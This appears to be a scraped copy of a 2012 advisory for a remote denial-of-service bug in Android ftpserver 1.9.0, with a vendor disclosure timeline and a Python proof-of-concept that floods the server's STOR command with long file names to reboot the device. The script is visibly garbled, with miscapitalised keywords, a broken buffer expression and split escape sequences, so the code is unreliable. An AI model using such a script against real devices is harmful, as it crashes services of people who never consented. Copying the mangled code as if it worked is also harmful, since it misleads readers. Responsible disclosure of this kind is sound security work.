[Security_android] Android ftpserver 1.9.0-remote DoS Code Analysis

Source: Internet
Author: User

# Exploit title:android ftpserver 1.9.0 Remote DoS
# DATE:03/20/12
# AUTHOR:G13
# Twitter: @g13net
# software site:https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download link:http://www.g13net.com/ftpserver.apk
# version:1.9.0
# Category:dos (Android)
#

##### Vulnerability #####

Ftpserver is vulnerable to a DoS condition when long file names be
Repeatedly attempted to be written via the STOR command.

Successful exploitation would causes devices to restart.

Android Security Team has confirmed this issue.

I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears is vulnerable.

##### Vendor Timeline #####

Android Security Team:
10/20/11-vendor notified of vulnerability, Vendor notifies me they would
Be looking to the issue
10/21/11-vendor requests bug report from device, bug report sent, PoC
Code delivered to Vendor
10/24/11-asked Vendor Status, stated I has been able to duplicate issue
On multiple devices
10/25/11-vendor states they is still working on it
10/30/11-current Status asked
10/31/11-vendor Replies No Updates
11/7/11-emailed Vendor, they ask for more clarification on issue. I
Submit more details
11/8/11-vendor acknowledges that it's not the APK itself causing the
Crashes. Vendor also confirms full reboots from PoC code.
11/9/11-vendor asks if I am just crashing application or device in
Certain instances. I state device is restarting.
11/11/11-i ask if there is anything more I could assist with. Vendor
States they has isolated the impacted component and is working on a
Fix.
11/18/11-current status asked.
12/8/11-update requested, response that they would contact Kernel team for
An update
01/13/12-current status asked, no response
03/06/12-current status asked, no response
03/20/12-disclosure

Developer:
1/24/12-developer contacted
1/25/12-developer responds
1/27/12-supplied Developer with PoC code, Developer confirms issue
1/29/12-developer releases new version
3/20/12-disclosure

##### PoC #####

#!/usr/bin/python
# Android Ftpserver PoC Device Crash

Import socket

s = socket.socket (socket.af_inet, socket. SOCK_STREAM)

Buffer = "STOR" + "A" * + + "\ r \ n"
For x in Xrange (1,31):
s = socket.socket (socket.af_inet, socket. SOCK_STREAM)
Print X
S.connect (' 172.16.30.108 ', 2121)

DATA=S.RECV (1024)
S.send ("USER test\r\n")
DATA=S.RECV (1024)
S.send ("PASS test\r\n")

S.send (buffer)

S.send ("QUIT")

S.close ()

[Security_android] Android ftpserver 1.9.0-remote DoS Code Analysis

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.